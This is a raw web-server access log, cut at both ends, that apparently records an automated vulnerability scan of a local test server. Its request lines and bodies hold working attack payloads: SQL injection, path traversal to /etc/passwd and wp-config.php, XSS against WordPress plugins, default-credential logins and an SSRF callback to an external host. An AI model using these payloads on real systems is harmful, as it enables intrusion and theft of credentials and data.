HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://ca28fg0smpvbd3qg07h0z894gp88qme65.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"name=ADMIN&pwd=ADMIN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"name=admin&pwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/opcache.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 